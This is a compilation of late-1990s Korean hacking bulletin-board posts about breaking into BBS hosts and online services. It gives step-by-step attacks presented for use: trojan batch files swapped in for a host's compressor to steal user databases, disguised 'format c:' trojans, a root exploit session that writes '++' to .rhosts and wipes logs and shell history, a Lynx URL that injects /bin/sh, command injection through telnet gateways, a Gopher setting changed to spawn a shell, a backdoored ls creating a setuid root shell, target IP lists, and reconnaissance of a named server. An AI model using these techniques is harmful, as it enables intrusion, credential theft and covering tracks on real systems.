 
 
제  목: 등대 호스트 해킹

  첫번째, 자동압축기능을 이용한 해킹방법입니다. 자동압축기능으로 해킹하는 방법은  자료
를 올린다음 자동압축기능을 실행하면 해당 압축기를 실행합니다. 이 압축기를 실행하는 순
간  해킹을   하는것입니다. 그러니까   RAR.EXE를  압축기로   사용한다면 RAR.BAT나 
RAR.EXE나 RAR.COM을 올리시면 압축기 대신 압축기와 파일명이 똑같은 RAR.BAT라는  
해킹 프로그램을 실행하겠죠? 그럼 RAR.BAT의 해킹순서를 정리해보죠

1. LIST.RAR이라는 작은 용량의 파일을 만들어서 올린다
2. 이제 RAR.BAT를 만든다
   C:\>COPY CON RAR.BAT
   RAR.BAT
   DIR\/S > LIST.RAR
   ^Z
3. RAR.BAT를 컴파일하는 프로그램으로 RAR.COM으로 다시 RAR.EXE로 바꾼다.
4. 이제 RAR.EXE를 자료실에 올린다. 이제  자동압축기능을  사용하면서 상대편의 하드리
스트가 LIST.CAP라는 파일에 저장이 된다.
5. 이제 자기가 올린 LIST.CAP라는 용량 작은 파일을  다운한다. 그러면 분명이 자신이 올
렸던 용량과 달리 용량이 엄청나게 올라갔을 거다. 이러면  이제 상대편 하드리스트를 뽑는
데는 성공이다.
6. 이제 잠깐 도스쉘을 해서 리스트를 본다. 그러면 상대편의 리스트가 보일것이다. 이제 상
대편의 호스트 디렉토리를 찾는다. 상대편의 호스트  디렉토리가 만약 C:\BBS라면 이제 다
시 프로그램을 만든다.
7. RAR.BAT를 다시 만든다
   C:\>DEL RAR.BAT
   C:\>DEL RAR.EXE
   C:\>DEL RAR.COM
   C:\>COPY CON RAR.BAT
   DEL LIST.RAR
   ARJ A LIST C:\BBS\*.*
   REN LIST.ARJ LIST.RAR
   ^Z
8. 이제 다시 이걸 컴파일하는 프로그램으로 RAR.EXE까지 만든다.
9. 이제 다시 이걸 상대편  BBS에 업로드한다. 그러면 자동압축중입니다.  잠시만 기다리세
요. 이런 비슷한 메세지가 나오면서 시간이  용량에 비해서 꽤 지연된다. 그러면 또 2단계는 
성공한거다
A. 이제 해킹은 마무리단계다. 이제 DD 명령을 이용해서 RAR.EXE 를 자료실에서 지운다.
B. 이제 V기능으로 LIST.RAR을 본다 그러면  한참후 BBS의  C:\BBS의 내용이 압축되어
서 보일것이다. 그러면 이제 USER.DAT와  USERDATA.DAT를 입력하여서 그 두개의 파
일만 받는다. 이제 해킹을 끝이다. 이제 다운방에 가면 11131213.RAR 비슷한 파일이 생겼을
것이다.  그 안에는 USER.DAT와 USERDATA.DAT가 있을것이다. 이걸 자신의 등대 디렉
토리에 복사한후에 DATAMAN.EXE를 실행시키면 상대편의 회원 목록들이 쫙 보일것이다. 
운영자의 비번을 알아냈으면...
C. 이제 다시 접속하여서 상대편 BBS를 마음껏 주무르자!


제  목: 트로이 바이러스 제일 간단한것들..

그냥 도스에서 bat 파일을 만든다. 내용은 그냥 format명령과 기타 지우는 명령등 여러가지
를 섞어서 bat 파일을 만든후 그 bat 파일을 com 으로 바꾸고 exe  로 바꾸면된다. com 그
대로 두던지 그러고 나서 아주 좋은  프로그램인양 속이고 나서 운영자가 실행을  시키도록 
유도한다. 아니면 진짜 좋은 프로그램을 올리고 중요한 인스톨  파일로 이름을 바꾼후에 업
로드 시키면 운영자는 별 이상한 점을 못느끼고 인스톨을 시도해 볼 것이다. 그러면 끝장나
겠죠. 트로이 목마 바이러스 말이 바이러스지 그냥 간단한 format c: 명령이랑 같네여 그것
을 속여서 다른 것으로 대체했다는 것이지만 이런건 조심조심하면 되여


제  목: 배치파일로 만든 트로이만드는법

보통 트로이 를 만들때 도스에서 배치 파일로 만든다음 com 으로 변화하던지 exe  로 변화
하지요. 그러나 이런 프로그램을 감지해서 알려주는 프로그램이 있어요.

제  목: [경험] 해킹

rz -b
B00000000

chmod 4755 xsr.c

rz -b
B000000000

gcc -o xsr xsr.c ; gcc -o zap zap.c

./xsr

whoami
root

./zap root
Zapping ROOT!!
cat .rhosts
++
+
^Z
cp .thosts /root/.rhosts

cd /etc
rm -rf *.log
rm -rf log*

cd
rm -rf .bash_history
대충 이런 방식....

글구 bash_hostory 이런건 저 처럼 지우시지 마시고 막아버리세요.
데몬을 이용하여 막던지 아니면
.bash_hitory 란 디렉토리를 만드시던지


제  목:  사설 비비

보통은 리눅스로 운영하죠...
대충 계정을 지원하는데를 찾아서..
guest 계정이 있는곳이면..
맨처음들어가서 여기 21 번 강좌 에있는 버그를 다 시도해보세요..
그럼 틀림없이 # 이란 쉘을 얻으실수 있으실 입니다.
리눅스는 버그가 그냥 먹힌다. 운영자가 게을르다.
리눅스 로 하는 비비는 거의 모두 그렇다...
그럼 # 쉘을 얻으 셧다면 무조건 부실라고 생각하시지 말고
꼭 정보를 빼네세요 아니면 운영자한테 알려 이익을 챙기던지..
예를 들어 스니퍼를 돌려 각 대형 호스트인
하이텔 , 나우누리 , 천리안 이런 호스트 말고 각 다른 사설비비...
등의 비번고  ID 를 얻으실수 있습니다.
그리고 자신만의 연습장으로 생각하시고..
배운 해킹을 써먹는것도 좋죠..
그리고 해킹하실때는
틈틈히 꼭! ps -aux | root 를 해보심이 좋을듯...
그럼
.

제  목: [해킹] 인포 비비에스에서의 외부 프로그램

인포 비비에스에서는 외부 프로그램을 돌리는 곳이 있다.
즉, 비비에스에서 외부로 나가기 위해 telnet 접속을 허용한다든지
뉴스 그룹을 보려고 tin 을 실행하던지
web을 보려고 lynx 라는 프로그램을 사용한다던지.
고 퍼 서비스를 하려고 고퍼 크로그램을 사용한다던지..
등등.. 많은 외부 프로그램들을 사용할 수가 있죠.
그 대표적인 서비스가 telnet 서비스죠.
그 다음은 텍스트로 웹을 볼수 있도록 고안된 lynx 라는 프로그램
여기서 제가 알려줄것은 바로 lynx 라는 프로그램을 돌리는
인포샵을 해킹하는 방법입니다.
아주 유용하며 일부 lynx 서비스하는 인포샵비비는 각별한
주의를 요망하며 악용하는 일이 없도록합시다.

보통 lynx 는 이런 화면이 나옵니다.

[soback4:/user5/kor1/shade]# lynx http://www.intercast.co.kr

                               (주)금인 - 금인사이버월드에 오신것을 환영합니다.

   REFRESH(5 sec): http://www.intercast.co.kr/index.htm

                        (주)금인 - 금인 사이버 월드

                             잠시만 기다리세요.

                                   [LINK]












Commands: Use arrow keys to move, '?' for help, 'q' to quit, '<-' to go back.
  Arrow keys: Up and Down to move. Right to follow a link; Left to go back.
 H)elp O)ptions P)rint G)o M)ain screen Q)uit /=search [delete]=history list

이런 형식으로 서비스가 시작된다.
보통 여기서 ! 를 누르게 되면 쉘로 빠지게 되는 일이 있다.
그러나 인포샵을 이용하는 분들은 이것을 패치하던지 소스를
변경해서 ! 커맨드를 막아 둡니다.
하지만 그런다고 쉘로 못빠질 쏘냐.
lynx 버그를 이용하면 바로 쉘로 빠집니다.
우선 g 를 누릅시다. 그러면 이런 화면이 나옵니다.

URL to open:   <= 이런 화면입니다.

이때 이런 커맨드가 있죠.
그러면 쉘로 빠짐니다.

위의 화면이 나와있을대 이렇게 ...

LYNXDOWNLOAD://Method=-1/File=/dev/null;/bin/sh;/SugFile=/dev/null
위를 그대로 입력하게 되면 이런 화면이 나오죠.

Enter a filename:

그러면 /dev/null 을 입력합니다.
그러면 이런 화면이

File exists. Overwrite? (y/n) 라고 하죠
Y를 누르면 바로 쉘로 뜹니다.
쉘이 뜬후에 stty echo 라고 입력하면 아주 정상적인 쉘로 뜹니다.
id 를 쳐보면 비비에스 계정입니다.
이때 해킹은 성공한거죠.
위의 과정을 자세히 다시 살펴보면
g 를 누른후에..

URL to open: LYNXDOWNLOAD://Method=-1/File=/dev/null;/bin/sh;/SugFile=/dev/null
Enter a filename: /dev/null
File exists. Overwrite? (y/n) y

$ stty echo

이런 과정입니다.
한번 id 를 쳐보세요 bbs 입니다.
마음 먹으면 인포샵 비비에스 다 지워버릴수도 있고
시삽이 될수도 있고. 좋죠?

이런 종류의 버그가 과거 하이텔 나우 에도 존재하였습니다.

제  목: 인포 비비에스의 텔넷 서비스 해킹

이번에 올링 해킹은 인포샵 비비에스에서 주로 하는 텔넷 서비스의
무능력 입니다.

어떤 곳은 컨트롤+c 를 접속되기 전에 뻔질나게(?) 누르면
성공이 되는 곳도 있었습니다.
지금은 모르겠지만..

본격적으로 말하려는 것은 이것이다.
바로 텔넷 서비스를 하는 곳..

이 버그 (?)는 아주 좋은(?) 버그이기 때문에 개념만 소개하고
자세한 것은 개인적인 메일이나 기타 매체를 이용하기 바란다.

우리는 비비에스 프로그램을 짤때 사용자의 편의를 최대한
보면서 만든다.
그중 텔넷서비스를 해주는 란을 만들고 있다고 치자(프로그래머가..)
계획 )
1. 사용자에게서 주소를 입력 받는다
2) ping 으로 그 주소가 살아있는지 확인해준다 (옵션 ^^;)
3) 연결해준다

이런 형식으로 프로그래머는 프로그래을 짤 것이다.
우선 주소를 입력 받을때 보통 특수문자에 대해서는 아무런 제한이
없이 입력 받는다. ( 어짜피 상관없다는 이야기??)
그후에 2번이나 3번 과정을 거쳐서 연결을 해준다.
하지만 이 과정을 대충 프로그램하면..

연결해주는 과정에서 system() 이라는 함수를 으례 쓰기 마련이다.
telnet 입력된 주소   <- 이런 식을 system() 함수에 넣는다.
즉, 사용자가 home.hitel.co.kr 을 넣었을때 프로그램은
InputData 변수에 home.hitel.co.kr 로 받는다.
sprintf(Telnet_Data,"/usr/bin/telnet %s",InputData);
system(Telnet_Data);

위는 하나의 예에 불과할뿐 언제나 그렇지는 않다..
아주 자연스럽게 사용자는 텔넷을 사용할 수 있다.
하지만 여기서 우리는 한가지 문제를 짚고 넘어가자

system()함수를 사용하게 되어 외부 프로그램인 telnet 을 돌리게
되면 제어는 비비에스에서 유닉스로 넘어오게 된다.
또한 유닉스 상태의 코드가 작용을 하게 된다.

이런 명령어를 실행하면 어떻게 되는 지 아는가?
cd /root ; ls -al ; echo "hahahaha"
위의 한줄 명령은 우선 root 디렉토리로 옮겨서 ls -al 이 실행된후
hahahaha 를 출력하고 끝낸다.
여기서 흰트를 얻을수 없을까?

바로 ; 라는 특수 문자이다.
이 특수문자는 유닉스제어에서 구분자(?)에 해당된다.

이 버그에 해당되는 인포샵 비비에스는 무려 5곳이 넘었다.
앞으로도 더 있을지도 모른다.

이쯤에도 아직 모르겠다고 생각하는 사람은 어서 유닉스와 프로그램 공부를
아주 조금만 더 하면 된다.

제  목: [해킹] 인포 비비에스의 외부 (2)

외부 프로그램을 사용시 유의할 점이 있죠
이번에는. 어떤 것을 할까요.
아주 쉬운거..
telnet 프로그램있죠?
이거 보통 ctrl + ] 키를 눌르면 이런 모드로 변하죠.
telnet>     <= 이런 모드
여기서 z 를 누르면 아시죠? 쉘로 빠지는거.
이것을 안막은 곳이 있을라나 모르겠군여.
99%는 막아두었게죠?

              ㅆ

제  목: [정보] 사설비비 인터넷주소.

제가 알고있는걸 올리겠습니다. 연결안되는곳도 있을수있을껍니다.

엑스넷 telnet 210.127.194.18
블루컴 telnet 210.113.215.2
야호넷 telnet 210.113.215.101
헤드넷 telnet 210.127.194.14
프로넷 telnet 210.127.194.70
하이밴 telnet 210.111.37.1
알파넷 telnet bbs.alpha.co.kr
멀티넷 telnet 210.236.85.10   login:multi
일주일 telnet 203.229.164.1
한통신 telnet 210.124.103.2
나드리 telnet nadri.co.kr       login:nadri
신천지 telnet scjnet.jsd.or.kr
체인스 telnet chains.or.kr       logim:chains
케이넷 telnet knet.alpha.co.kr
코코텔 telnet 168.126.145.1
뮤직넷 telnet musicnet.co.kr
워드넷 telnet 210.127.194.18
스마트라인 telnet 210.123.193.3
키스코넷 telnet 203.233.144.1
아바투아 telnet 210.111.23.1
코리아넷 telnet 210.127.194.10
키텔 telnet kitel1.kitel.or.kr
블루넷 telnet blue.alpha.co.kr

좋은정보가 되길 바래요.
느낌하나 telnet 210.111.8.11


제  목: [참고] 엘림넷.. 계정 서버..

엘림넷.계정 서버에 한번 가본적이 있었네요.
그런데 보안 패치를 한건지 안한건지는 몰라도..
몇가지 버그가 안통하더군요.
하지만 ps 버그는 통해요.
여기 버그란에 공개된 ps 버그중 최신 버그를 사용해보니..
가능하더군요.
gdb 를 써서 ps 를 살펴보는 그런 버그 리포트 있을꺼에요.
참고하구용.
거기 운영자에게 편지를 보내니깐.. 별 신통치 않은 반응이 있네용.
별 상관을 안하는 듯.
보니깐 몇몇 유저들이 스니퍼를 열시미 돌리던뎅.
무서운 곳이군요.
크크. 아무나 루트 되어서 스니퍼나 돌리공.
엘림넷.. 크크. 그러다가 사고 날라..

제  목: [해킹] 하이텔 해킹성공담 ( 몇개월전 )

몇달전에 비밀리에 하이텔에서 통용되었던 해킹 방법이
고퍼라는 프로그램에 있습니다.
하이텔 인터넷 서비스란에 가보시면 알겠지만

ftp 고퍼 lynx tin usenet news archie ppp telnet 등의 서비스를
하고 있습니다.
일반적으로 패치를 자주 하는 바람에 버그는 있지 않았습니다.
하지만 하이텔의 고퍼라는 프로그램은 버그는 없었지만 시스템 설정하는
부분에서 상당히 위험한 일이 생겼습니다.
즉 일반 유저가 고퍼 설정을 건드릴수가 있었죠.
이에 하이텔에 쉘로 빠지는 버그가 생겼습니다.
이의 과정을 잘보시면 그 것을 알수 있습니다.
참고로 지그은 통용 되지 않습니다. (크크)
하지만 불과 3달(?)전까지는 통용된거 같았습니다.
이 사실은 극소수 만이 알았으며 3명.. 아주 비밀리 시행
된것입니다.
하지만 이제는 되지 않습니다.
그래서 이렇게 밝히는 거죠..
이제는 구식 정보가 된거 같기도 하지만 다른 곳의 통신망에서는
아주 유용하게 쓰여집니다.

그럼 우선 그 과정을 살펴 볼까요?
우선 고퍼 메뉴를 선택합니다.
일반 계정 사용자는 연습삼아서 해보려면 gopher 이라고
계정에서 입력해보세요 만약 그 프로그램이 있다면 이런 화면이
나옴니다. 고퍼 메뉴로 들어갔을 경우도.. 마찬가지

ex) 여기서는 코넷의 고퍼 화면을 빌려서 자료로 씁니다.


                    Home Gopher server: gopher.kornet.nm.kr

 -->  [1]  KORNET 새소식/
      [2]  KORNET 가입안내/
      [3]  KORNET 서비스/
      [4]  게임 광장/
      [5]  문헌 정보/
      [6]  KORNET 접속/
      [7]  Client Program set-up 및 이용/
      [8]  WEB Home Page 작성법/
      [9]  KORNET 사용자를 위한 FAQ/








Press ? for Help, q to Quit                                         Page: 1/1

위의 화면이 나오면 고퍼가 성공정으로 띄워진것입니다.
이때 우리는 대문자 O 를 입력해보세요.
그러면 이렇게 화면이 바뀝니다.

                    Home Gopher server: gopher.kornet.nm.kr

 -->  [1]  KORNET 새소식/
      [2]  KORNET 가입안내/
      [3]  KORNET 서비스/
      [4]  게임 광장/
      [5]  문헌 정보/
      [6]  KORNETejjjjjjjjjjjjjjjGopher Optionsjjjjjjjjjjjjjjjd
      [7]  Clientq                                            q
      [8]  WEB Hoq  -->   1. General Options                  q
      [9]  KORNETq        2. Configure Display Applications   q
                 q        3. Configure Printing Applications  q
                 q        4. Define New Content-Type          q
                 q                                            q
                 q  Your Choice (1-4):                        q
                 q  [Help: ?]  [Cancel - ^C]                  q
                 fjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjc


(이하 생략)

위의 화면에서 Gopher options 라는 곳을 자세히 보세요.
1번으로 화살표가 되어있죠? 우리는 여기서 2번을 선택해야
합니다.
Configure Display Applications 를 선택해야 하기 때문이죠.
선택후 엔터를 누르세요.
그럼 이렇게 화면이 바뀝니다.

ejjjjjjjjjjjjjjjjjjjjjjjConfigure Display Applicationsjjjjjjjjjjjjjjjjjjjjjjjjd
q                                                                             q
q Text                        builtin                                         q
q text/plain                  builtin                                         q
q audio/basic                 |play -v 40 -&                                  q
q Image                       xv %s                                           q
q Terminal/telnet             telnet %s                                       q
q Terminal/tn3270             tn3270 %s                                       q
q text/html                   lynx -force_html %s                             q
q text/richtext               richtext %s|Less -f -r                          q
q text/rip                    showrip %s                                      q
q text/tab-separated-values   builtin                                         q
q text/x-dvi                  xdvi %s                                         q
q text/x-tex                                                                  q
q text/x-troff                nroff %s|more -d                                q
q message/rfc822              builtin                                         q
q image/gif                   |xv -                                           q
q image/ief                                                                   q
q image/jpeg                                                                  q
q image/ppm                   |xv -                                           q
q image/tiff                  tifftopnm|xv -                                  q
q                                                                             q
q [Help: ^-]  [Cancel: ^C]  [Accept: ^X]  [Next field: TAB]                   q

위에서 우리가 눈여겨 보아야 할 항목은..

q Terminal/telnet             telnet %s                                       q
q Terminal/tn3270             tn3270 %s                                       q

이 항목입니다. 특히
 Terminal/telnet             telnet %s  <= 이부분을 바꿈으로써
우리는 그 유닉스의 어떤 명령어든지 사용할 수 있습니다.
여기서 %s 라는 것은 인수를 전달 받을 것을 의미합니다.
C 프로그램을 아신다면 %s 는 문자열을 말하는 것임을
짐작하겠죠?

그럼이제 우리는 telnet %s 라는 항목을 없애고
/bin/sh 라고 바꿈니다.
그러면 이렇게 되는 거죠?

ejjjjjjjjjjjjjjjjjjjjjjjConfigure Display Applicationsjjjjjjjjjjjjjjjjjjjjjjjjd
q                                                                             q
q Text                        builtin                                         q
q text/plain                  builtin                                         q
q audio/basic                 |play -v 40 -&                                  q
q Image                       xv %s                                           q
q Terminal/telnet             /bin/sh                                         q
                              ( 윗부분이 변했죠?)
q Terminal/tn3270             tn3270 %s                                       q
q text/html                   lynx -force_html %s                             q
q text/richtext               richtext %s|Less -f -r                          q
q text/rip                    showrip %s                                      q
q text/tab-separated-values   builtin                                         q
q text/x-dvi                  xdvi %s                                         q
q text/x-tex                                                                  q
q text/x-troff                nroff %s|more -d                                q
q message/rfc822              builtin                                         q
q image/gif                   |xv -                                           q
q image/ief                                                                   q
q image/jpeg                                                                  q
q image/ppm                   |xv -                                           q
q image/tiff                  tifftopnm|xv -                                  q
q                                                                             q

그럼 우리는 Ctrl + x 를 누릅니다.

그러면 초기 화면으로 바뀌죠.

                    Home Gopher server: gopher.kornet.nm.kr

 -->  [1]  KORNET 새소식/
      [2]  KORNET 가입안내/
      [3]  KORNET 서비스/
      [4]  게임 광장/
      [5]  문헌 정보/
      [6]  KORNET 접속/
      [7]  Client Program set-up 및 이용/
      [8]  WEB Home Page 작성법/
      [9]  KORNET 사용자를 위한 FAQ/






그러면 이젠 W 나 w 를 눌러보세요.그럼 이런 화면이 나옵니다.


                    Home Gopher server: gopher.kornet.nm.kr

 -->  [1]  KORNET 새소식/
      [2]  KORNET 가입안내/
      [3]  KORNET 서비스/
      [4]  게임 광장/
      [5]  문헌 정보/
      [6]  KORNET 접속/
ejjjjjjjjjjjjjjjjjjjjjjjjjjjConnect to a new serverjjjjjjjjjjjjjjjjjjjjjjjjjjjd
q                                                                             q
q http, gopher, ftp, telnet or tn3270 URL to connect to:                      q
q                                                                             q
q                                                                             q
q                                                                             q
q [Help: ^-]  [Cancel: ^C]  [Accept: ^X]  [Next field: TAB]                   q
fjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjc



커서는
http, gopher, ftp, telnet or tn3270 URL to connect to: 밑에
있겠죠?

그러면 우리는 이렇게 입력하면 됩니다.

telnet://

위를 입력하고 엔터를 누르세요.
그러면 이런 화면이 나옵니다.

                                 KORNET 새소식

 -->  [1]  동호회 시삽공모 및, 지원 안내               (97.07.18)
      [2]  콜보너스 안내                               (97.07.12)
      [3]  코넷 소백시스템 설치장소 이전 안내          (97.07.09)
      [4]  ?jjjjjjjjjjjjjjjjjjjjjjtelnet://jjjjjjjjjjjjjjjjjjjjjjd
      [5]  훢                                                     q
      [6]  햝  Warning!!!!!, you are about to leave the Internet  q
ejjjjjjjjjjjq  Gopher program and connect to another host. If     qjjjjjjjjjjjd
q           q  you get stuck press the control key and the        q           q
q http, gophq  ] key, and then type quit                          q           q
q           q                                                     q           q
q telnet:// q  Connecting to , port 23 using telnet.              q           q
q           q                                                     q           q
q [Help: ^-]q                                                     q           q
fjjjjjjjjjjjq                                                     qjjjjjjjjjjjc
      [15] 퇽                          [Cancel - ^C] [OK: Enter]  q
            fjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjc

그러면 우리는 다시 엔터를 누르세요.
그러면 화면이 깨끗해지고
$
위의 $ 표시가 나오죠? 바로 유닉스 프롬프트 입니다.
id 를 치면 하이텔 비비에스의 계정 로그인이 되겠죠?
bbs 계정요.

그럼 성공한겁니다.

바로 하이텔 해킹.. 3~4달 전에 되었던 것이었습니다.

모든 사람들이 꿈에도 그리던 해킹이 바로 이런 방법이었습니다.
위의 방법대로 해서 성공했었을때(3~4달전) 하이텔을 없앨수도
있다는 거죠.
그건 진짜 나쁜놈들이 하겠죠?
그런 사람을 바로 크래커라고 합니다.

이젠 그 버그는 모든 통신망에 막혀 있습니다.

해보세요.. 대문자 O를 누르자 마자 권한이 없다면서
설정자체를 막아놓았기 때문이죠.

하이텔 해킹 알고보면 별거 아니죠?
80% 버그는 언제나 외부 프로그램 실행중에 있습니다.
왜냐.. 제어권이 비비에스에서 유닉스로 넘어가기 때문이죠.

언제나 외부 프로그램을 비비에스에서 실행이 가능하게
만들때는 외부 프로그램의 소스를 구해다가 옵션등을 고쳐서
사용하지 못하게 한후 컴파일해서 올리는 것이 상식입니다.
하지만 실수란것이 있겠죠?

제  목: [해킹] kornet (코넷) 해킹을 했던 사람

코넷을 관리하는 사람은 아주 많아요.
root 도 있구요.. koradm gazete(보안 수사대) .. 에공 까먹었다.
하도 오래전 일이라서요..

코넷에 어떤 일이 벌어졌었냐면요.. 많은 해커&크래커들이
아주 난리를 치는 곳이었습니다.
그곳 해킹에 성공하면서 아주 많은 사람들이 그곳 루트를 이미 잠재적
으로 점령했더군요.
아주 많은 사람들요.
많은 백도어들이 존재하였고.. 그중 아주 웃기는 백도어는.
코넷 계정 cybertac 라는 사람이 있었거든여? 지금은 짤렸더군요.
그 cybertac 라는 사람이 해킹을 시도 하려고 한것은 바로
ls 라는 명령어를 변경시켰었어요.
즉.. 코넷에는 ls 라는 명령어가 두군데에 잇어요.

[soback1:/user/kor/????]# whereis ls
ls: /usr/bin/ls /usr/ucb/ls /usr/man/man1/ls.1 /usr/man/man1b/ls.1b
[soback1:/user/kor/????]# ls -al /usr/bin/ls
-r-xr-xr-x   1 bin         16644 May  3  1996 /usr/bin/ls
[soback1:/user/kor/????]# ls -al /usr/ucb/ls
-rwxr-xr-x   1 bin         13612 May  3  1996 /usr/ucb/ls

이렇게 되어있습니다. 코넷의 경우에요 그런데 그 cybertac 라는 사람이
솔라리스의 chkperm 의 버그를 이용해서 bin 계정을 획득했더군요.
( 21번 유/리 해킹 경험담란에서 lt chkperm 이라고 하면 자세히..)
그후에 그는 루트를 얻지 못하였었어요. 그러나 그는 트로이 프로그램을 만들어서
ls 라는 프로그램을 변경시켰습니다.
위에서 보시다 시피 코넷의 ls 명령어의 권한은 bin 입니다.
하지만 ls 명령어를 변경하려면 지우고 새로 만들어야겠죠? 그렇게 하려면 ls 가
있는 디렉토리가 bin 이 마음대로 쓸수 있는 환경이 있어야 해요.
즉. /usr/bin 디렉토리의 소유는 root 이고 아무나 쓰지 못하는 모드로 되어있을때
/usr/bin 디렉토리에 일반 유저가 파일을 생성할수 없어서 변경을 못하죠.
하지만 ls 는 /usr/bin 뿐 아니라 /usr/ucb라는 디렉토리에도 하나 있어요.
과거에 코넷의 /usr/bin 디렉토리는 root 권한 /usr/ucb 디렉토리는 bin의 권한으로
되어있었죠. 지금은 root 로 변경되었어요.
그래서 cybertac라는 사람은 /usr/ucb라는 디렉토리의 ls 명령어를 교환할 수 있었죠.

그는 bin 계정을 획득하였으니까요.
그는 ls 명령어를 어떻게 변경하였냐면은..

1) ls 명령어를 실행한 사람의 uid를 구분한다.
2) 만약 실행한 사람의 uid 가 0 일 경우 루트쉘을 자기 홈디렉토리에다가
   만들어 놓는다.
   ex ) cp /bin/sh ~cybertac/
        chmod 4755 ~cybertac/sh
3) 만약 일반 유저.. 즉 uid 가 0 이 아닌 유저라면은 그냥 ls 를 실행한다.
   /usr/bin/ls

대충 이런 형식이었습니다.
대단하죠? ( 사실 무식한거임.. -.-; )

그러나 그는 들켰습니다.
그 변경한 ls 가 아마도 걸린거 같았더군요. 그 후 그 사람은 계정 삭제가 되었고
그후에 어떤 일이 벌어졌는지 모르겠군요.
아마도 그 사람을 잡으려고 해커수사대(gazete <= 나이 드신 분)가 떳었나봐요.


제  목: [참고] 에듀넷 해킹은..

지금 다시 에듀넷 가보니깐 버그가 막혀있더군요.
하이텔도 마찬가지로 막혀있어요.
한달전까지만 해도 잘 통하던 버그가.
에듀넷의 버그는 바로 telnet 접속을 해주는 곳이 문제였죠.
에듀넷 초기화면 -> 25. 인터넷 문자 서비스 -> 32번 telnet
여기서 32번 telnet 에서 그냥 쉘로 빠짐니다.
! 나 z 같은 커맨드를 써서 쉘로 빠지지 않습니다.
절대로.
이것에서 쉘로 나가려면 프로그램지식과 유닉스에 대한
지식이 있어야 합니다.
바로.. 구분특수 문자에 대해서 잘 알면 되죠.
비슷한 예로 IFS 라는 것이 있어요.
이곳 강좌란에 있어요.
이곳 강좌란 글 제대로 읽었다면 에듀넷 해킹은 식은죽
먹기였어요.
그것을 모르시고 계셨다니
킥킥
이젠 늦었어요.
다 막혔더군요.
쩝..
이젠 다른 곳을 찾으러 돌아다녀야 할듯..
언제나 노력하는 습관을 기르세요.


제  목: [정보] KBS 홈페이지 해킹 가능성...

가능성이 보이더군요.
그곳 서버는 초보가 운영하는지.. 아주 허술한점이 많이 보여요.
그 증거가..여기 있습니다.

# rusers -l www.kbs.co.kr
root         www.kbs.co.kr:console     Apr  2 09:50   26:50
root         www.kbs.co.kr:pts/0       Apr 14 10:59  129:27

위에서 보다 시피 kbs 서버의 현재 로그인 상황을 알려주더군요.

우선 가능성이 보입니다.

이번에는

# telnet www.kbs.co.kr 25
Trying 210.115.192.7...
Connected to kbsnt.kbs.co.kr.
Escape character is '^]'.
220-kbsnt.kbs.co.kr Sendmail 8.6.12h2/8.6.9 ready at Sun, 19 Apr 1998 02:29:41 -
0900
220 ESMTP spoken here
quit
221 kbsnt.kbs.co.kr closing connection
Connection closed by foreign host.

KBS 서버의 센드 메일 버젼이 8.6.12 버젼..
버그가 상당히 많기로 말이많은 8.6.12 버젼이더군요.
리모트 버그가 존재 합니다.
또한 \n 버그또한 존재하구요.

# rpcinfo -p www.kbs.co.kr
   program vers proto   port  service
    100000    4   tcp    111  rpcbind
    100000    3   tcp    111  rpcbind
    100000    2   tcp    111  rpcbind
    100000    4   udp    111  rpcbind
    100000    3   udp    111  rpcbind
    100000    2   udp    111  rpcbind
    100024    1   udp  32772  status
    100024    1   tcp  32771  status
    100232   10   udp  32773  sadmind
    100011    1   udp  32774  rquotad
    100021    3   udp   4045  nlockmgr
    100021    4   udp   4045  nlockmgr
    100012    1   udp  32776  sprayd
    100008    1   udp  32777  walld
    100001    2   udp  32778  rstatd
    100001    3   udp  32778  rstatd
    100001    4   udp  32778  rstatd
    100068    2   udp  32779
    100068    3   udp  32779
    100003    2   udp   2049  nfs
    100003    3   udp   2049  nfs
    100227    2   udp   2049  nfs_acl
    100227    3   udp   2049  nfs_acl
    100005    1   udp  32781  mountd
    100005    2   udp  32781  mountd
    100005    3   udp  32781  mountd
    100003    2   tcp   2049  nfs
    100003    3   tcp   2049  nfs
    100227    2   tcp   2049  nfs_acl
    100227    3   tcp   2049  nfs_acl
    100005    1   tcp  32775  mountd
    100005    2   tcp  32775  mountd
    100005    3   tcp  32775  mountd
1342177279    3   tcp  32776
1342177279    1   tcp  32776
1342177279    2   tcp  32776
 쓸데 없이 띄운 데몬들이 많군요.

KBS 홈페이지 웬지 가능성이 보이지 않나요?
센드 메일상의 버그..
서버 안의 모든 상황을 볼수 있는 현상..
statd 데몬이 떠있더군요.. ^^;
rusersd 데몬이 떠 있기에 rusers 명령이 먹히겠죠..

# telnet www.kbs.co.kr 80
Trying 210.115.192.7...
Connected to kbsnt.kbs.co.kr.
Escape character is '^]'.

HTTP/1.1 400 Bad Request
Server: Netscape-Enterprise/3.0

Your browser sent a message this server could not understand.Connection closed b
y foreign host.

웹으로 들어가보았네요.
넷스케이프-엔터 프라이즈/3.0 음..

수 많은 버그들..